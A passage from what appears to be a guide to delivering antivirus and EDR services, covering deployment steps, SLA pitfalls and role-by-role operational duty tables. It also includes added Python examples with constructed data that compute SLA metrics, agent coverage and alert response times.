This may involve setting policies, defining security settings, and configuring
alert and reporting settings.
e. Update virus definitions: The antivirus software will need to be updated with
the latest virus definitions to ensure that it can effectively protect against
known threats. This can typically be done automatically or manually through
the software's interface.
f. Scan the system: Once the antivirus software has been installed and
configured, it's important to run a scan of the system to ensure that there are
no existing threats. The scan can be performed using the software's default
settings or using custom settings if desired.
g. Verify the installation: After the scan has been completed, it's important to
verify that the antivirus software is working as expected. This may involve
checking the accuracy of alerts, reviewing logs and reports, and ensuring that
the software is running without any errors or issues.
These are the general steps involved in installing an antivirus solution. The
specific steps will depend on the solution being used and the environment in
which it is being installed. It's always recommended to follow the vendor's
instructions and best practices when installing an antivirus solution.
5. Configuration: After installation, the antivirus solution will need to be configured to
meet the specific needs and requirements of the organization. This may involve setting
policies, defining security settings, and configuring alert and reporting settings.
Sometimes, in complex environments, configuration, fine-tuning and stabilisation
take 6-9 months of regular trial and error. This has the potential for cost over-runs.
Agree with the client on what the expectations are and on how over-runs will be
handled if they take place.
6. Testing: Before going live with the antivirus solution, it's important to test the solution
to ensure that it is working as expected. This may involve running tests, verifying the
accuracy of alerts, and checking the effectiveness of the solution against known
threats. Test environments normally need extra:
a. sandboxes,
b. hardware or virtual machines,
c. operating systems and licenses,
d. database systems and licenses, and sometimes
e. client access licenses.
Clients normally agree to provide these environments. If not, these need to be costed
into the solution and included in the price quoted to clients.
7. Deployment: After the solution has been tested and validated, it can be deployed in
the production environment. This may involve installing the solution on all devices,
updating virus definitions, and ensuring that the solution is integrated with other
security technologies.
8. Maintenance: After the antivirus solution has been deployed, ongoing maintenance
will be required to ensure that the solution remains effective and up to date. This may
involve updating virus definitions, applying software patches, and monitoring the
solution for performance and security issues.
These are the general steps involved in implementing an antivirus solution. The specific steps
will depend on the needs and requirements of the organization, as well as the solution being
used.
3.3.4 What can go wrong in an antivirus solution

There are several things that can go wrong when implementing an antivirus solution,
including:
1. Compatibility issues: The antivirus solution may not be compatible with the systems
and devices that it is intended to protect, leading to performance issues or even
system crashes.
2. Configuration errors: The antivirus solution may be configured incorrectly, leading to
false positives or false negatives, or causing the solution to miss threats.
3. Updates not installed: If antivirus definition updates are not installed regularly, the
solution may be unable to protect against new threats.
4. Human error: The antivirus solution can only be as effective as the people using it.
User error, such as clicking on malicious links or disabling the antivirus solution, can
expose the system to risk.



5. Lack of integration: If the antivirus solution is not integrated with other security
technologies, such as firewalls or intrusion detection systems, it may not provide
adequate protection.
6. Performance impact: The antivirus solution may have a significant impact on system
performance, especially on older systems or systems with limited resources.
7. False alarms: The antivirus solution may generate false alarms, leading to user
frustration and potentially wasting time and resources.
8. Vulnerability exploitation: In some cases, the antivirus solution itself may contain
vulnerabilities that can be exploited by attackers.
These are just some of the potential issues that can arise when implementing an antivirus
solution. It's important to carefully consider these risks and take steps to mitigate them, such
as properly configuring the solution, regularly updating virus definitions, and providing user
education and training.
3.3.5 What Service Levels can be committed/ expected?

Service Level Agreements (SLAs) in antivirus services can vary depending on the specific needs
of an organization and the level of service offered by the provider. However, some common
SLAs that can be committed in antivirus services include:
1. Availability: The percentage of time that antivirus software and related systems are
available and functioning as intended.
2. Response time: The amount of time it takes for the antivirus support team to respond
to and resolve a reported issue.
3. Update frequency: The frequency at which the antivirus software is updated to
protect against new threats.
4. Threat detection rate: The percentage of malware incidents detected by the antivirus
software.
5. False positive rate: The percentage of benign files that are incorrectly flagged as
malware by the antivirus software.
6. Incident resolution time: The amount of time it takes to resolve a malware incident,
from the time it is reported to the time it is fully resolved.
7. Data privacy: The measures taken by the antivirus service provider to protect sensitive
data, such as client information, during the course of providing antivirus services.
These are just a few examples of the types of SLAs that can be committed in antivirus services.
The specific SLAs that are included in a contract will depend on the needs and requirements
of the organization. But please keep in mind that it is not always possible to provide an
accurate resolution time commitment; hence, be careful about accepting penalty conditions
in contracts.
3.3.6 Why can't any vendor commit resolution time/ SLA accurately?

Accurately providing a resolution time commitment in cybersecurity is challenging for several
reasons:

1. Complexity of security incidents: Cybersecurity incidents can range from simple
malware infections to complex, multi-faceted attacks that are difficult to fully
understand and resolve. This makes it difficult to accurately predict the amount of
time it will take to resolve a given incident.
2. Evolving threats: The nature of cyber threats is constantly evolving, with new and more
sophisticated attacks appearing all the time. This means that even experienced
cybersecurity teams may encounter new and unexpected challenges when attempting
to resolve an incident, which can make it difficult to provide accurate resolution time
commitments.
3. Interdependencies: Many cybersecurity incidents involve multiple systems and
technologies and resolving one issue may require resolving multiple underlying issues.
This can make it difficult to accurately predict the amount of time it will take to fully
resolve an incident.
4. Limited information: In many cases, the information available about a cybersecurity
incident may be limited or incomplete, making it difficult to accurately assess the
scope of the issue and predict the amount of time it will take to resolve.
Given these challenges, it is not always possible to accurately provide a resolution time
commitment in cybersecurity. Instead, cybersecurity teams may aim to provide a range of
possible resolution times, or a commitment to resolve the incident as quickly as possible,
while ensuring that all necessary steps are taken to thoroughly resolve the issue and prevent
future incidents.
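As an added example that is not part of the original guide, the following computes the SLA metrics listed in 3.3.5 from one month of constructed service data and shows the point made in 3.3.6: the resolution-time median sits well inside a target while the tail does not, so a single resolution-time commitment is risky. The targets, outage minutes, verdict counts and incident timestamps are all constructed assumptions.

```python
"""Antivirus/EDR service-level metrics from constructed monthly data.

Added example, not code from the guide or any vendor. Computes availability,
threat detection rate, false positive rate and resolution-time statistics,
reporting resolution time as a distribution (median and p95) rather than a
single number.
"""
import math
import statistics
from datetime import datetime

# Constructed month of service data (assumptions, not real figures).
MONTH_MINUTES = 30 * 24 * 60
OUTAGE_MINUTES = [45, 120]  # management console / update server outages

# Verdicts over the month: malware the product caught (tp), malware it missed
# and that was found later (fn), benign files it flagged (fp), benign files
# it correctly left alone (tn).
VERDICTS = {"tp": 188, "fn": 12, "fp": 9, "tn": 4391}

# Incident (reported, resolved) timestamps, ISO 8601, constructed.
INCIDENTS = [
    ("2024-03-01T09:00", "2024-03-01T11:00"),  # 2 h, single-host cleanup
    ("2024-03-03T14:00", "2024-03-03T17:00"),  # 3 h
    ("2024-03-05T08:00", "2024-03-05T12:00"),  # 4 h
    ("2024-03-08T10:00", "2024-03-08T15:00"),  # 5 h
    ("2024-03-12T09:30", "2024-03-12T15:30"),  # 6 h
    ("2024-03-15T11:00", "2024-03-15T19:00"),  # 8 h
    ("2024-03-20T08:00", "2024-03-22T08:00"),  # 48 h, multi-host spread
    ("2024-03-25T08:00", "2024-03-30T08:00"),  # 120 h, interdependent systems
]

# Assumed contractual targets.
SLA_TARGETS = {"availability_pct": 99.5, "detection_rate_pct": 95.0,
               "false_positive_rate_pct": 1.0, "resolution_hours": 8.0}


def availability_pct(total_minutes, outage_minutes):
    """Percentage of the period the service was available."""
    return 100.0 * (total_minutes - sum(outage_minutes)) / total_minutes


def detection_rate_pct(v):
    """Percentage of malware incidents the product detected."""
    return 100.0 * v["tp"] / (v["tp"] + v["fn"])


def false_positive_rate_pct(v):
    """Percentage of benign files incorrectly flagged."""
    return 100.0 * v["fp"] / (v["fp"] + v["tn"])


def resolution_hours(incidents):
    """Hours from report to full resolution for each incident."""
    hours = []
    for opened, closed in incidents:
        delta = datetime.fromisoformat(closed) - datetime.fromisoformat(opened)
        hours.append(delta.total_seconds() / 3600)
    return hours


def percentile(values, pct):
    """Nearest-rank percentile: p95 is an actually observed resolution time."""
    ordered = sorted(values)
    rank = max(1, math.ceil(pct / 100 * len(ordered)))
    return ordered[rank - 1]


def sla_report(targets=SLA_TARGETS):
    """Compute each SLA metric and whether the assumed target was met."""
    hours = resolution_hours(INCIDENTS)
    within = sum(h <= targets["resolution_hours"] for h in hours)
    report = {
        "availability_pct": round(availability_pct(MONTH_MINUTES, OUTAGE_MINUTES), 3),
        "detection_rate_pct": round(detection_rate_pct(VERDICTS), 2),
        "false_positive_rate_pct": round(false_positive_rate_pct(VERDICTS), 3),
        "resolution_median_h": statistics.median(hours),
        "resolution_p95_h": percentile(hours, 95),
        "resolution_within_target_pct": round(100.0 * within / len(hours), 1),
    }
    report["met"] = {
        "availability": report["availability_pct"] >= targets["availability_pct"],
        "detection_rate": report["detection_rate_pct"] >= targets["detection_rate_pct"],
        "false_positive_rate": report["false_positive_rate_pct"] <= targets["false_positive_rate_pct"],
        # The median is inside target but the long tail is not: a flat
        # resolution-time commitment would be breached by two incidents.
        "resolution_p95": report["resolution_p95_h"] <= targets["resolution_hours"],
    }
    return report


if __name__ == "__main__":
    for key, value in sla_report().items():
        print(f"{key}: {value}")
```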
3.4 Delivery cue- Anti-virus and EDR operations

3.4.1 Daily Anti-virus operations activities

Daily anti-virus operation activities typically include the following tasks:


1. Running regular scans: Regularly scanning all devices, systems, and networks for
malware to detect and remove any potential threats.
2. Updating malware definitions: Keeping the anti-virus software up to date with the
latest malware definitions to ensure that it can detect and remove the latest threats.
3. Monitoring event logs: Reviewing event logs for any suspicious activity, such as
repeated failed login attempts, to detect and respond to potential threats.
4. Managing quarantined files: Regularly reviewing and managing quarantined files to
ensure that no legitimate files are mistakenly quarantined and to determine the
appropriate action for any malware detected.
5. Maintaining backups: Regularly backing up important data to ensure that it can be
restored in the event of a malware attack or other security breach.
6. Evaluating security reports: Reviewing security reports to identify any potential
security weaknesses or areas where the anti-virus solution can be improved.
7. Responding to incidents: Responding quickly to any security incidents, such as a
malware attack, to contain the damage and prevent further spread of the malware.



In short, daily anti-virus operation activities are essential to ensuring the effective protection
of a computer or network against malware and other cyber threats. By performing these tasks
regularly, organizations can keep their anti-virus software up-to-date and effectively respond
to any potential threats.
3.4.2 Weekly Anti-virus operations activities

Weekly anti-virus operation activities typically include the following tasks:


1. Updating anti-virus software: Regularly updating the anti-virus software to ensure that
it has the latest security patches and features.
2. Reviewing scan results: Reviewing the results of regular anti-virus scans to ensure that
all devices, systems, and networks are free from malware and other threats.
3. Performing vulnerability assessments: Conducting regular vulnerability assessments to
identify any potential security weaknesses in the system and to determine what steps
need to be taken to address them.
4. Conducting security audits: Conducting security audits to ensure that all devices and
systems are properly configured and that all security measures are in place and
working as intended.
5. Testing disaster recovery procedures: Regularly testing disaster recovery procedures
to ensure that they will work as intended in the event of a malware attack or other
security breach.
6. Training employees: Providing regular training to employees on how to identify and
respond to cyber threats, as well as best practices for security awareness and safe
computing.
7. Reviewing security policies: Reviewing and updating security policies as needed to
ensure that they are current and relevant to the organization's changing security
needs.
In short, weekly anti-virus operation activities are essential to ensuring the ongoing
effectiveness of a computer or network's anti-virus solution. By performing these tasks
regularly, organizations can identify potential security weaknesses and take the necessary
steps to address them, as well as keep their employees informed and trained on how to
respond to cyber threats.
3.4.3 Monthly Anti-virus operations activities

Monthly anti-virus operation activities typically include the following tasks:


1. Reviewing security incidents: Reviewing and analysing security incidents from the past
month to determine if any trends or patterns exist, and to identify areas for
improvement in the anti-virus solution.
2. Evaluating security software: Evaluating the performance of the anti-virus software
and determining if it needs to be updated or replaced with a more effective solution.
3. Updating security plans: Updating the organization's security plans and procedures as
needed, to ensure that they are current and relevant to the organization's changing
security needs.



4. Conducting risk assessments: Conducting regular risk assessments to identify any
potential security risks and to determine what steps need to be taken to mitigate
them.
5. Reviewing user access: Reviewing user access logs to ensure that users are only
accessing the systems and data that they need to do their job, and to identify any
potential security threats.
6. Managing software licenses: Reviewing and managing software licenses to ensure that
all software used by the organization is properly licensed and up to date.
7. Monitoring network activity: Monitoring network activity for any unusual activity or
potential security threats.
In short, monthly anti-virus operation activities are important for maintaining the overall
security of a computer or network. By performing these tasks regularly, organizations can
identify potential security risks and take the necessary steps to mitigate them, as well as keep
their anti-virus software and security plans up-to-date and effective.

3.4.4 What does an L1 Antivirus Engineer do?

An L1 (Level 1) Antivirus Engineer is responsible for the initial triage and response to alerts
generated by the antivirus system. Some of the common activities performed by an L1
Antivirus/EDR Engineer include:
1. Monitoring and triaging alerts: The L1 engineer monitors the alerts generated by the
antivirus and EDR system, assesses their severity, and takes appropriate actions to
investigate and contain the threat.
2. Conducting basic analysis: The L1 engineer performs basic analysis of the alerts to
determine the nature of the threat and identify any affected systems. They may also
search for additional indicators of compromise and communicate their findings to the
L2 or L3 team.
3. Responding to incidents: The L1 engineer responds to security incidents, such as
malware infections or suspicious activity, by initiating remediation steps, such as
isolating or quarantining affected systems.
4. Escalating incidents: If the L1 engineer is unable to contain or remediate a security
incident, they escalate the issue to the L2 or L3 team for further investigation and
response.
5. Maintaining documentation: The L1 engineer maintains detailed documentation of
the alerts, incidents, and their responses, including any remediation steps taken, for
future reference and reporting purposes.
6. Conducting basic maintenance: The L1 engineer may perform basic maintenance
activities on the antivirus and EDR system, such as updating virus definitions or running
scans, to ensure its ongoing effectiveness.
Overall, the L1 Antivirus/EDR Engineer plays a critical role in the initial response to security
incidents and in ensuring the overall effectiveness of the antivirus and EDR system. They work
closely with the L2 and L3 teams to provide support, escalate issues, and drive the ongoing
development and improvement of the system.

3.4.5 What does an L2 Antivirus Engineer do?

An L2 (Level 2) Antivirus Engineer is responsible for investigating and responding to security
incidents that have been escalated by the L1 team. Some of the common activities performed
by an L2 Antivirus Engineer include:
1. Incident investigation: The L2 engineer investigates security incidents escalated by the
L1 team and performs in-depth analysis to identify the root cause of the incident, the
extent of the impact, and any affected systems.
2. Malware analysis: The L2 engineer conducts malware analysis to determine the
behaviour of the malware, the systems it has infected, and any potential vulnerabilities
or attack vectors that may have been exploited.
3. Threat hunting: The L2 engineer performs threat hunting activities, such as proactively
searching for indicators of compromise and conducting analysis to detect any
suspicious or anomalous activity on the network or endpoints.
4. Response coordination: The L2 engineer coordinates incident response activities,
including isolating infected systems, containing the incident, and remediating the
threat.
5. Documentation and reporting: The L2 engineer maintains detailed documentation of
the incident investigation and response, including any remediation steps taken, for
future reference and reporting purposes.
6. Technology management: The L2 engineer is responsible for managing the antivirus
and EDR technology, ensuring that it is up to date, properly configured, and effectively
integrated into the overall security architecture.
Overall, the L2 Antivirus/EDR Engineer plays a critical role in incident investigation and
response, as well as in ensuring the ongoing effectiveness of the antivirus and EDR system.
They work closely with the L1 and L3 teams to provide support, drive the development of new
security controls and processes, and continuously improve the overall security posture of the
organization.

3.4.6 What does an L3 Antivirus Engineer do?

An L3 (Level 3) Antivirus Engineer is responsible for the overall management of the antivirus,
including designing, implementing, and maintaining the solution. Some of the common
activities performed by an L3 Antivirus Engineer include:
1. Design and architecture: The L3 engineer is responsible for designing and architecting
the antivirus and EDR system, ensuring that it meets the organization's security
requirements, is scalable, and integrates effectively with other security technologies.
2. Technical leadership: The L3 engineer provides technical leadership to the L1 and L2
teams, serving as a subject matter expert and providing guidance and direction on
incident investigation and response, system management, and technology
implementation.
3. Performance and capacity management: The L3 engineer monitors the performance
and capacity of the antivirus and EDR system, identifying and addressing any
performance or scalability issues, and proactively planning for future growth.
4. Risk management: The L3 engineer is responsible for managing the risk associated with
the antivirus and EDR system, identifying and mitigating any vulnerabilities or
weaknesses in the system.
5. Vendor management: The L3 engineer works closely with vendors to ensure that the
antivirus and EDR solution is up to date, properly configured, and effectively
integrated with other security technologies.
6. Technology innovation: The L3 engineer drives technology innovation within the
antivirus and EDR domain, researching new technologies and approaches to improve
the overall effectiveness of the system.
Overall, the L3 Antivirus/EDR Engineer plays a critical role in the ongoing management and
optimization of the antivirus and EDR system. They work closely with other security teams to
ensure that the system is integrated effectively with other security technologies, and they are
responsible for ensuring that the system is designed, implemented, and maintained to the
highest standards.



3.4.7 What does an EDR Service Engineer do?

Daily activities of an EDR Service Engineer (Sl No., Head: service engineer work particulars; frequency: Daily):
1. Monitoring and Incident Response: Monitor the EDR console to identify any security incidents or alerts triggered by potential threats on endpoints.
2. Incident Triage: Investigate and triage security incidents to assess their severity, impact, and root cause.
3. Threat Hunting and Intelligence: Conduct proactive threat hunting activities using [vendor]'s EDR capabilities to identify hidden or advanced threats on endpoints.
4. Endpoint Health Checks: Review the health and status of endpoints, ensuring that the agent is operational and up to date.
5. Troubleshooting and Support: Provide technical support and troubleshooting assistance to end-users and other IT or security teams related to EDR functionalities and deployments.
6. Security Policy Management: Review and fine-tune security policies within the console to align with the organization's security requirements.
7. Vulnerability Assessment and Patching: Use the platform's vulnerability assessment features to identify vulnerable endpoints and collaborate with IT teams to prioritize patching.
8. Malware Analysis: Analyze and investigate suspicious files or incidents to determine if they represent real threats.
9. Creating and Modifying Rules: Create or modify detection and response rules in [vendor platform] to improve threat detection or response capabilities.
10. Engagement with Other Security Teams: Collaborate with other security teams, such as SOC (Security Operations Center) or incident response teams, to share intelligence and coordinate response efforts.
11. Documentation: Maintain documentation of incidents, investigations, and actions taken for future reference and reporting.
12. End-User Training and Education: Conduct training sessions and workshops for end-users to raise awareness about cybersecurity best practices and proper use of the EDR solution.
13. Analyzing Threat Intelligence: Review external threat intelligence sources to stay informed about the latest threats and vulnerabilities, and apply relevant information to improve the organization's security posture.
14. Security Tool Integration: Integrate with other security tools, such as SIEM or SOAR platforms, to streamline incident response workflows and enhance overall security operations.
15. Continuous Learning: Stay updated on the latest trends, technologies, and best practices in cybersecurity and EDR to enhance your expertise and effectiveness in the role.



Weekly activities of an EDR Service Engineer (Sl No., Head: particulars; frequency: Weekly):
1. Weekly Incident Review: Conduct a weekly review of security incidents and alerts triggered by the EDR solution. Analyze the incidents to identify any emerging patterns or trends.
2. Threat Intelligence Update: Stay updated on the latest threat intelligence and security research to understand new attack vectors and threats relevant to the organization.
3. Performance Monitoring: Monitor the performance of the EDR platform to ensure it is functioning optimally and efficiently.
4. Endpoint Health Assessment: Perform a weekly health check on endpoints to verify that all devices have the latest agent version and are reporting correctly.
5. Vulnerability Assessment Follow-up: Review the status of identified vulnerabilities on endpoints and coordinate with IT teams to ensure timely patching and mitigation.
6. Rule Tuning and Optimization: Analyze the effectiveness of existing detection and response rules and fine-tune them to reduce false positives and improve threat detection accuracy.
7. Threat Hunting Sessions: Conduct scheduled threat hunting sessions to proactively search for potential threats that may have bypassed traditional security controls.
8. Documentation Updates: Keep incident reports, investigations, and changes to security policies and configurations up-to-date in the documentation.
9. Collaboration with SOC and IR Teams: Coordinate with the Security Operations Center (SOC) and Incident Response (IR) teams to share findings and enhance response strategies.
10. Training and Knowledge Sharing: Organize training sessions or knowledge-sharing sessions with other IT or security teams to improve their understanding of the EDR platform and its capabilities.
11. Testing and Evaluations: Conduct periodic testing and evaluations of new features, updates, or changes to the platform in a controlled environment before implementing them in production.
12. Performance Reporting: Generate weekly reports on the performance and effectiveness of the EDR solution, including incident trends and response times.
13. Security Awareness Initiatives: Contribute to security awareness initiatives across the organization to promote a culture of security and best practices.
14. Continuous Improvement: Identify areas for improvement in the EDR operations and propose enhancements to optimize the efficiency and effectiveness of the solution.
15. Long-Term Planning: Participate in long-term planning discussions related to cybersecurity strategy and improvements to the organization's overall security posture.



Sl No. | Head | Particulars | Frequency
1 | Monthly Threat Analysis | Conduct an in-depth analysis of security incidents and threat trends observed over the past month. Identify any patterns or changes in the threat landscape. | Monthly
2 | Endpoint Performance Review | Perform a comprehensive review of endpoint performance and health metrics to identify any anomalies or issues that require attention. | Monthly
3 | Policy Review and Update | Review existing security policies and configurations in the EDR platform. Assess their effectiveness and update them if necessary to align with evolving threats and business needs. | Monthly
4 | Endpoint Coverage Assessment | Verify the coverage of agents on all endpoints within the organization. Address any gaps in coverage to ensure all devices are protected. | Monthly
5 | User Training Sessions | Conduct monthly training sessions for end-users and employees to promote cybersecurity awareness and reinforce best practices. | Monthly
6 | Incident Response Exercise | Organize a simulated incident response exercise to test the organization's response capabilities and identify areas for improvement. | Monthly
7 | Patch Management Review | Review the organization's patch management process and assess the effectiveness of patching activities in reducing vulnerabilities. | Monthly
8 | Root Cause Analysis Review | Revisit previous security incidents and conduct root cause analyses to identify systemic issues and opportunities for prevention. | Monthly
9 | Endpoint Baseline Review | Reevaluate the baseline behavior and security posture of endpoints. Update baselines as needed to improve threat detection accuracy. | Monthly
10 | Vendor Communication | Engage with representatives or participate in vendor webinars to stay informed about product updates, features, and best practices. | Monthly
11 | Endpoint Cleanup | Review and remove any outdated or unnecessary policies, rules, or configurations to maintain a streamlined and efficient EDR environment. | Monthly
12 | Security Metrics and Reporting | Compile monthly security metrics and reports to track the overall security posture and demonstrate the effectiveness of the EDR solution to stakeholders. | Monthly
13 | Budget and Resource Planning | Collaborate with management to plan budget allocations for cybersecurity initiatives and resource requirements for ongoing EDR operations. | Monthly
14 | Continuous Education | Dedicate time for self-learning and professional development in the field of cybersecurity to enhance expertise and stay up-to-date with industry trends. | Monthly
15 | Strategic Planning | Participate in strategic planning sessions to align EDR initiatives with the organization's broader cybersecurity and business goals. | Monthly
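The Endpoint Coverage Assessment row above is the one monthly task that can be checked mechanically: compare what the asset inventory says exists with what the EDR console says is enrolled and checking in. The script below is an added example, not code from the document or from any EDR vendor; the inventory, the agent list, the hostnames, the 7-day staleness threshold and the 7.2.0 minimum agent version are all constructed assumptions, and a real run would read the two lists from a CMDB export and the console's API instead.

```python
from datetime import datetime, timedelta

# Constructed sample data (not from the page): an asset inventory export and the
# agent list as an EDR console might export it (hostname, agent version, last check-in).
INVENTORY = [
    "WS-FIN-001", "WS-FIN-002", "WS-HR-001",
    "SRV-DB-01", "SRV-WEB-01", "LT-SALES-007",
]

AGENTS = {
    "WS-FIN-001": {"version": "7.2.1", "last_seen": "2024-05-20T08:15:00"},
    "WS-FIN-002": {"version": "7.2.1", "last_seen": "2024-05-20T07:50:00"},
    "SRV-DB-01": {"version": "7.1.0", "last_seen": "2024-05-02T23:10:00"},  # silent for weeks
    "SRV-WEB-01": {"version": "7.2.1", "last_seen": "2024-05-20T08:01:00"},
    "LT-CONTRACTOR-3": {"version": "7.2.1", "last_seen": "2024-05-19T17:40:00"},  # not in inventory
}

# Point in time at which the assessment is run (fixed so the example is reproducible).
REFERENCE_TIME = datetime(2024, 5, 20, 9, 0, 0)


def parse_version(text):
    """'7.2.1' -> (7, 2, 1) so versions compare numerically, not as strings."""
    return tuple(int(part) for part in text.split("."))


def assess_coverage(inventory, agents, now, stale_after=timedelta(days=7),
                    min_version="7.2.0"):
    """Compare the inventory with the enrolled agents and return the gaps.

    missing  - inventoried hosts with no agent at all
    stale    - hosts whose agent has not checked in within `stale_after`
    outdated - hosts running an agent older than `min_version` (assumed threshold)
    unknown  - agents reporting in that the inventory does not know about
    coverage_pct counts only hosts that are enrolled AND checking in on time.
    """
    inv = set(inventory)
    enrolled = set(agents)
    missing = sorted(inv - enrolled)
    unknown = sorted(enrolled - inv)
    stale, outdated = [], []
    for host in sorted(inv & enrolled):
        rec = agents[host]
        silent = now - datetime.fromisoformat(rec["last_seen"])
        if silent > stale_after:
            stale.append((host, silent.days))
        if parse_version(rec["version"]) < parse_version(min_version):
            outdated.append((host, rec["version"]))
    healthy = len(inv & enrolled) - len(stale)
    coverage_pct = round(100.0 * healthy / len(inv), 1) if inv else 0.0
    return {
        "missing": missing,
        "stale": stale,
        "outdated": outdated,
        "unknown": unknown,
        "coverage_pct": coverage_pct,
    }


def coverage_report(result):
    """Render the gaps as the short text block a monthly review would paste into its notes."""
    lines = [f"Agent coverage (healthy agents / inventoried hosts): {result['coverage_pct']}%"]
    for label, key in (("No agent", "missing"), ("Stale agent", "stale"),
                       ("Outdated agent", "outdated"), ("Not in inventory", "unknown")):
        for item in result[key]:
            detail = item if isinstance(item, str) else f"{item[0]} ({item[1]})"
            lines.append(f"  {label}: {detail}")
    return "\n".join(lines)


if __name__ == "__main__":
    print(coverage_report(assess_coverage(INVENTORY, AGENTS, REFERENCE_TIME)))
```

Two design points matter for the review: a host whose agent is installed but has gone silent is counted as uncovered, because an agent that is not reporting gives no detection, and an agent that the inventory does not know about is listed separately, since it usually means either an inventory gap or a device that should not be on the network at all.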

Sl No. | Head | Particulars | Frequency
1 | Threat Landscape Analysis | Conduct a comprehensive analysis of the evolving threat landscape and identify emerging trends and new attack vectors. | Quarterly
2 | EDR Platform Evaluation | Review the performance and capabilities of the EDR platform. Assess whether it meets the organization's evolving needs and consider potential upgrades or enhancements. | Quarterly
3 | Threat Hunting Campaign | Plan and execute a thorough threat hunting campaign, focusing on specific indicators or areas of concern identified in the quarterly threat analysis. | Quarterly
4 | Security Awareness Training Update | Evaluate the effectiveness of the security awareness training conducted for end-users and employees. Make updates or improvements to the training content and delivery methods. | Quarterly
5 | Incident Response Review | Review and analyze security incidents that occurred over the past quarter. Identify trends, patterns, and potential gaps in incident response processes. | Quarterly
6 | Vulnerability Management Assessment | Evaluate the effectiveness of the organization's vulnerability management program and identify areas for improvement. | Quarterly
7 | Rules and Policies Review | Conduct a comprehensive review of the detection and response rules, policies, and configurations in the EDR platform. Optimize rules for improved accuracy and reduced false positives. | Quarterly
8 | Endpoint Security Metrics | Gather quarterly endpoint security metrics to track performance and measure the impact of the EDR solution on the organization's security posture. | Quarterly
9 | Engagement with Security Vendors | Engage with cybersecurity vendors and attend industry conferences or webinars to stay informed about the latest security technologies and trends. | Quarterly
10 | Incident Response Tabletop Exercise | Conduct a simulated tabletop exercise with relevant teams to test the incident response process and identify opportunities for improvement. | Quarterly
11 | Quarterly Reporting to Management | Prepare and present a quarterly report to management, highlighting the effectiveness of the EDR solution and key security insights. | Quarterly
12 | Budget Review and Planning | Collaborate with stakeholders to review the cybersecurity budget and plan for any additional resource requirements or investments. | Quarterly
13 | Threat Intelligence Sharing Review | Review the organization's participation in threat intelligence sharing communities and ensure active collaboration with peer organizations. | Quarterly
14 | Updates on Compliance Requirements | Stay updated on changes to industry-specific regulations and compliance requirements. Ensure that the EDR solution aligns with these standards. | Quarterly
15 | Strategic Planning for Future Enhancements | Collaborate with other security teams and management to plan strategic enhancements to the organization's overall security posture, leveraging the capabilities of the EDR solution. | Quarterly

3.4.8 What does an EDR Service Manager do

Sl No. | Head | Service Engineer work particulars | Frequency
1 | Team Coordination | Communicate with the EDR Service Engineer team to assign tasks, prioritize activities, and ensure smooth workflow. | Daily
2 | Incident Management | Review and oversee the handling of security incidents and alerts triggered by the EDR platform. Provide guidance and support in incident response efforts. | Daily
3 | Performance Monitoring | Monitor the performance and health of the EDR solution and endpoints to ensure optimal functioning. | Daily
4 | Engagement with Stakeholders | Collaborate with other IT and security teams, such as SOC, IR, and IT operations, to ensure effective communication and coordination. | Daily
5 | Reporting and Metrics | Review and analyze daily metrics and reports related to EDR performance, security incidents, and response times. | Daily
6 | Resource Allocation | Allocate resources appropriately to address high-priority tasks and incidents efficiently. | Daily
7 | Escalation Management | Manage escalations from the EDR Service Engineer team and provide guidance in resolving complex issues. | Daily
8 | Vendor Communication | Interact with representatives or support teams to address technical issues, feature requests, or other inquiries. | Daily
9 | Training and Development | Support the professional development of the EDR Service Engineer team by providing training, mentorship, and guidance. | Daily
10 | Policy Review and Update | Review security policies and configurations within the EDR platform. Ensure they align with security best practices and organizational requirements. | Daily
11 | Compliance Oversight | Ensure that the EDR operations adhere to relevant regulatory requirements and compliance standards. | Daily
12 | Collaboration with Management | Liaise with upper management to provide updates on EDR operations, progress, and key performance indicators. | Daily
13 | Continuous Improvement Initiatives | Identify areas for process improvement and implement strategies to enhance the effectiveness and efficiency of the EDR service. | Daily
14 | Customer Engagement | Interact with key customers to address their concerns, gather feedback, and ensure satisfaction with the EDR service. | Daily
15 | Risk Assessment and Mitigation | Assess potential risks to the EDR infrastructure and develop mitigation plans to minimize security vulnerabilities. | Daily

Sl No. | Head | Particulars | Frequency
1 | Team Meeting | Conduct weekly meetings with the EDR Service Engineer team to discuss ongoing tasks, challenges, and progress on incidents and projects. | Weekly
2 | Incident Review | Review recent security incidents and their handling by the EDR Service Engineer team. Provide feedback and guidance to improve incident response. | Weekly
3 | Performance Metrics Analysis | Analyze weekly performance metrics, such as threat detection rates, incident response times, and false positives, to identify trends and areas for improvement. | Weekly
4 | Status Updates to Management | Prepare and present weekly status updates to upper management on EDR operations, incident trends, and the overall security posture. | Weekly
5 | Resource Allocation | Assess resource requirements for the upcoming week and allocate personnel and tools based on the workload and priority tasks. | Weekly
6 | Customer Engagement | Communicate with key customers to address any concerns, update them on ongoing incidents, and ensure satisfaction with the EDR service. | Weekly
7 | Policy and Rule Review | Collaborate with the EDR Service Engineer team to review and update security policies and detection rules as needed to enhance threat detection accuracy. | Weekly
8 | Threat Intelligence Analysis | Stay updated on the latest threat intelligence and analyze how it can be used to improve EDR capabilities. | Weekly
9 | Training and Knowledge Sharing | Plan training sessions or knowledge-sharing sessions for the EDR Service Engineer team to enhance their skills and keep them informed about the latest EDR features and best practices. | Weekly
10 | Review EDR Alerts and Alarms | Review alerts and alarms generated by the EDR solution to ensure that critical incidents are appropriately prioritized and addressed. | Weekly
11 | Collaboration with SOC and IR Teams | Coordinate with the Security Operations Center (SOC) and Incident Response (IR) teams to share insights, improve communication, and streamline incident response processes. | Weekly
12 | Review Service Level Agreements (SLAs) | Evaluate SLAs and ensure that the EDR team is meeting response time and resolution targets. | Weekly
13 | Vendor Communication | Engage with representatives or support teams to address technical issues, seek guidance, or escalate critical matters. | Weekly
14 | Compliance Check | Verify that EDR operations are in compliance with relevant regulatory standards and internal policies. | Weekly
15 | Documentation and Reporting | Ensure that incident reports, metrics, and other documentation are up-to-date and accurate for future reference and audits. | Weekly
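Rows 3 and 12 of the weekly table (performance metrics and SLA review) come down to the same computation over the week's alert queue: time to acknowledge, time to resolve, false-positive share, and which alerts missed their target. The script below is an added example that is not part of the document or any vendor's reporting; the six alert records, the four severity levels and the SLA targets in SLA_MINUTES are constructed assumptions, and in practice the records would come from the EDR console's alert export. It also handles the case the weekly review most often gets wrong, an alert that is still open and already past its resolution target.

```python
from datetime import datetime
from statistics import mean

# Constructed sample alert records for one week (not from the page). Times are UTC,
# ISO-8601; "resolved" is None for an alert still open when the report is produced.
ALERTS = [
    {"id": "A-1001", "severity": "critical", "detected": "2024-05-13T02:10:00",
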